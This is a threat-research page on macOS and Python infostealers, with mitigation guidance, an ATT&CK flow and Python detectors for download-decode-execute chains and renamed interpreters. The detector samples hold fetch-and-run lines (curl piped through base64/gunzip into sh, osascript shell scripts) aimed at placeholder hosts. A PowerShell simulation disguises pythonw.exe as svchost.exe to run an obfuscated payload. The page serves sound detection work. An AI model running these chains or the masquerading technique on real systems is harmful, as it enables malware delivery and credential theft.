SOC Prime Bias: Medium

05 Feb 2026 16:58

Infostealers without borders: macOS, Python stealers, and platform abuse

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Infostealer campaigns are no longer Windows-only: they increasingly target macOS, rely on cross-platform languages like Python, and abuse trusted platforms such as WhatsApp and PDF tools. Adversaries spread macOS stealers like DigitStealer, MacSync, and AMOS through fake DMGs and click-fix prompts, while Python stealers such as PXA Stealer arrive via phishing emails. These operations harvest credentials, cryptocurrency wallet data, and developer secrets, then exfiltrate them to attacker-controlled servers. Detection is harder due to fileless execution, signed binaries, and use of legitimate services for C2.

Investigation

Microsoft Defender researchers tracked multiple waves from late 2025 through 2026, collecting hashes, URLs, domains, and IPs tied to the activity. They documented persistence methods (registry Run keys, scheduled tasks, LaunchAgents), fileless execution via curl and AppleScript, and C2 over Telegram and other services. The write-up also provides sample KQL queries to surface suspicious endpoint and network signals.

Mitigation

Mitigations emphasize user training, blocking unsigned DMG installers, and monitoring for risky terminal chains that combine curl, base64, gunzip, or osascript. Enforce endpoint protections against LOLBIN abuse and block outbound traffic to known malicious domains. Expand detections for registry Run keys, scheduled tasks, and process-injection patterns associated with stealers.
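The terminal-chain monitoring recommended above can be expressed as a small classifier over process-creation telemetry. The following is an example added to this page, not SOC Prime's or Microsoft Defender's detection content: it tokenizes a command line, unwraps `sh -c "..."` style wrappers, lists the programs in each pipeline stage, and flags curl output piped through base64/gunzip into a shell, as well as osascript running an inline `do shell script`. The event layout (`parent`, `image`, `cmd`) and every sample event are constructed for illustration, and the URLs use the reserved `.invalid` domain.

```python
import re
import shlex

# Constructed process-creation events that stand in for real endpoint
# telemetry; the field names are an assumption, not a vendor schema.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "image": "/bin/bash",
     "cmd": 'bash -c "curl -fsSL https://example.invalid/p | base64 -d | gunzip | sh"'},
    {"parent": "Terminal", "image": "/usr/bin/osascript",
     "cmd": "osascript -e 'do shell script \"curl -s https://example.invalid/a -o /tmp/a\"'"},
    {"parent": "Terminal", "image": "/usr/bin/curl",
     "cmd": "curl -O https://example.invalid/release-notes.pdf"},
    {"parent": "Terminal", "image": "/usr/bin/gunzip",
     "cmd": "gunzip logs.tar.gz"},
    {"parent": "Terminal", "image": "/bin/zsh",
     "cmd": 'zsh -c "curl -fsSL https://example.invalid/x | sh"'},
]

SHELLS = {"sh", "bash", "zsh"}
DECODERS = {"base64", "gunzip"}


def _basename(token):
    return token.rsplit("/", 1)[-1]


def _split(text):
    """shlex.split with a plain-whitespace fallback for unbalanced quotes."""
    try:
        return shlex.split(text)
    except ValueError:
        return text.split()


def _unwrap_shell_c(tokens):
    """For `sh -c '<cmd>'` style invocations return the inner command line."""
    if tokens and _basename(tokens[0]) in SHELLS and "-c" in tokens:
        i = tokens.index("-c")
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def pipeline_tools(cmdline):
    """Ordered program names of each pipeline stage, e.g. ['curl', 'base64', 'gunzip', 'sh'].
    Splitting on '|' ignores pipes inside quotes, which is good enough here."""
    tools = []
    for stage in cmdline.split("|"):
        toks = _split(stage)
        if toks:
            tools.append(_basename(toks[0]))
    return tools


def classify(event):
    """Return the reasons an event is suspicious; an empty list means no match."""
    toks = _split(event["cmd"])
    if not toks:
        return []
    reasons = []
    prog = _basename(toks[0])
    inner = _unwrap_shell_c(toks)
    tools = pipeline_tools(inner if inner is not None else event["cmd"])
    if "curl" in tools and set(tools) & DECODERS:
        reasons.append("curl output piped through base64/gunzip")
    if "curl" in tools and len(tools) > 1 and tools[-1] in SHELLS:
        reasons.append("downloaded content executed by a shell")
    if prog == "osascript":
        scripts = [toks[i + 1] for i, t in enumerate(toks) if t == "-e" and i + 1 < len(toks)]
        if any(re.search(r"do shell script", s, re.I) for s in scripts):
            reasons.append("osascript running an inline shell script")
    return reasons


def flagged(events):
    """Indices of events with at least one reason."""
    return [i for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for i in flagged(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmd"], classify(SAMPLE_EVENTS[i]))
```

The plain `curl -O` download and the standalone `gunzip` are left alone, which is the point: the signal is the chain (download, decode, execute in one line), not any single tool. Pipes nested inside quoted arguments are not parsed here; a production rule would walk the process tree instead of re-parsing the string.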

Response

When detected, isolate the endpoint, terminate malicious processes, remove persisted artifacts (registry keys, scheduled tasks), and block C2 infrastructure. Run forensics to determine what was stolen, reset compromised credentials, and notify affected users. Deploy refreshed detection rules and enable block-mode EDR to stop repeat infections.

Attack Flow

    graph TB
    %% Class Definitions
    classDef technique fill:#99ccff
    classDef operator fill:#ff9900
    %% Nodes
    tech_phishing["<b>Technique</b> – T1566: Phishing<br/><b>Description</b>: malicious email containing a link or attachment that, when opened, initiates the attack."]
    class tech_phishing technique
    tech_copy_paste["<b>Technique</b> – T1204.004: Malicious Copy and Paste<br/><b>Description</b>: user executes copied terminal commands, enabling the payload to run."]
    class tech_copy_paste technique
    tech_unix_shell["<b>Technique</b> – T1059.004: Unix Shell<br/><b>Description</b>: use of a shell pipeline (curl | base64 -d | gunzip) to retrieve and unpack the payload."]
    class tech_unix_shell technique
    tech_compression["<b>Technique</b> – T1027.015: Compression<br/><b>Description</b>: payload is delivered as base64-encoded and compressed data to evade detection."]
    class tech_compression technique
    tech_decode["<b>Technique</b> – T1140: Deobfuscate/Decode Files or Information<br/><b>Description</b>: script decodes the base64 data and extracts the malicious binary."]
    class tech_decode technique
    tech_launch_agent["<b>Technique</b> – T1543.001: Launch Agent<br/><b>Description</b>: creates a user-level LaunchAgent plist in ~/Library/LaunchAgents for persistence."]
    class tech_launch_agent technique
    tech_launch_daemon["<b>Technique</b> – T1543.004: Launch Daemon<br/><b>Description</b>: installs a system LaunchDaemon to achieve persistence with higher privileges."]
    class tech_launch_daemon technique
    tech_archive["<b>Technique</b> – T1560.001: Archive Collected Data via Utility<br/><b>Description</b>: data is zipped in /tmp before exfiltration."]
    class tech_archive technique
    tech_telegram["<b>Technique</b> – T1102: Exfiltration Over Web Service (Telegram)<br/><b>Description</b>: zip file is sent to a remote Telegram bot via the Telegram API."]
    class tech_telegram technique
    tech_file_deletion["<b>Technique</b> – T1070.004: File Deletion<br/><b>Description</b>: removes the zip archive, plist and temporary files to hide artifacts."]
    class tech_file_deletion technique
    %% Connections
    tech_phishing -->|leads_to| tech_copy_paste
    tech_copy_paste -->|leads_to| tech_unix_shell
    tech_unix_shell -->|includes| tech_compression
    tech_unix_shell -->|includes| tech_decode
    tech_unix_shell -->|creates| tech_launch_agent
    tech_unix_shell -->|creates| tech_launch_daemon
    tech_unix_shell -->|triggers| tech_archive
    tech_archive -->|used_for| tech_telegram
    tech_telegram -->|followed_by| tech_file_deletion

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    An attacker with local admin rights prepares a malicious payload. First, they copy the legitimate pythonw.exe to a new file named svchost.exe in a user‑writable directory (e.g., %TEMP%). They then embed an obfuscated Python script that exfiltrates credentials. Finally, they execute the renamed interpreter, which generates a process‑creation event where the process name is svchost.exe but the version‑info still reports pythonw.exe. This exact pattern matches the Sigma rule.

  • Regression Test Script:

    #----------------------------------------------
    # Stage 1 – Prepare malicious svchost.exe copy
    #----------------------------------------------
    $tempDir = "$env:TEMP\malicious"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    $src = "$env:ProgramFiles\Python311\pythonw.exe"   # adjust path to existing pythonw.exe
    $dst = "$tempDir\svchost.exe"                       # renamed interpreter; version info still says pythonw.exe
    Copy-Item -Path $src -Destination $dst -Force
    
    #----------------------------------------------
    # Stage 2 – Create obfuscated Python payload
    #----------------------------------------------
    $payload = @"
    import base64, subprocess, sys
    cmd = base64.b64decode('cHV0cyAtcGFzc3dvcmQgZXhhbXBsZQ==').decode()
    subprocess.run(cmd, shell=True)
    "@
    $payloadPath = "$tempDir\payload.py"
    $payload | Set-Content -Path $payloadPath -Encoding UTF8
    
    #----------------------------------------------
    # Stage 3 – Execute malicious svchost.exe (pythonw)
    #----------------------------------------------
    Start-Process -FilePath $dst -ArgumentList "`"$payloadPath`""
    
    #----------------------------------------------
    # Stage 4 – Optional: wait for detection ingestion
    #----------------------------------------------
    Start-Sleep -Seconds 10
  • Cleanup Commands:

    # Remove malicious artifacts
    Remove-Item -Path "$env:TEMP\malicious" -Recurse -Force
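The process-creation event the simulation generates (image name svchost.exe, version info still reporting pythonw.exe) is what the detection must key on. The following is an example added to this page and is not the Sigma rule the narrative refers to: it compares the image's file name with the `OriginalFileName` value from the binary's version resource and raises severity when the chosen name imitates a Windows system process or the image lives in a user-writable directory. The events use Sysmon Event ID 1 field names as an assumed shape, and every sample event, path and user name is constructed.

```python
import ntpath

# Version-info names of the interpreters this check cares about.
INTERPRETER_NAMES = {"python.exe", "pythonw.exe"}
# Names commonly borrowed to blend in with Windows system processes.
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "services.exe", "csrss.exe"}
# Lower-cased path fragments that indicate a user-writable location.
USER_WRITABLE_MARKERS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\users\\public\\")

# Constructed process-creation events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {  # the simulation above: pythonw.exe copied to %TEMP%\malicious\svchost.exe
        "Image": r"C:\Users\alice\AppData\Local\Temp\malicious\svchost.exe",
        "OriginalFileName": "pythonw.exe",
        "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\malicious\svchost.exe" "C:\Users\alice\AppData\Local\Temp\malicious\payload.py"',
    },
    {  # the genuine service host
        "Image": r"C:\Windows\System32\svchost.exe",
        "OriginalFileName": "svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    },
    {  # an interpreter run under its own name
        "Image": r"C:\Program Files\Python311\pythonw.exe",
        "OriginalFileName": "pythonw.exe",
        "CommandLine": r'"C:\Program Files\Python311\pythonw.exe" C:\Tools\backup.py',
    },
    {  # renamed, but with an unremarkable name in a normal tool directory
        "Image": r"C:\Tools\runner.exe",
        "OriginalFileName": "python.exe",
        "CommandLine": r"C:\Tools\runner.exe job.py",
    },
]


def check_event(ev):
    """Return a finding when the image name disagrees with the interpreter
    recorded in version info, otherwise None."""
    image = ev.get("Image", "")
    name = ntpath.basename(image).lower()
    original = (ev.get("OriginalFileName") or "").lower()
    if original not in INTERPRETER_NAMES or original == name:
        return None
    finding = {"image": image, "original": original, "severity": "medium", "indicators": []}
    if name in SYSTEM_NAMES:
        finding["indicators"].append("uses a Windows system process name")
        finding["severity"] = "high"
    if any(marker in image.lower() for marker in USER_WRITABLE_MARKERS):
        finding["indicators"].append("runs from a user-writable directory")
        finding["severity"] = "high"
    return finding


def scan(events):
    """All findings for a batch of events, in input order."""
    return [f for f in (check_event(ev) for ev in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["image"], finding["indicators"])
```

Two caveats a practitioner should keep in mind: `OriginalFileName` comes from the PE version resource, so a copy whose resource has been stripped or edited will not match this check and needs a hash or signer comparison instead; and the lower-severity `runner.exe` case shows why a bare name mismatch alone is a triage lead rather than an alert on its own.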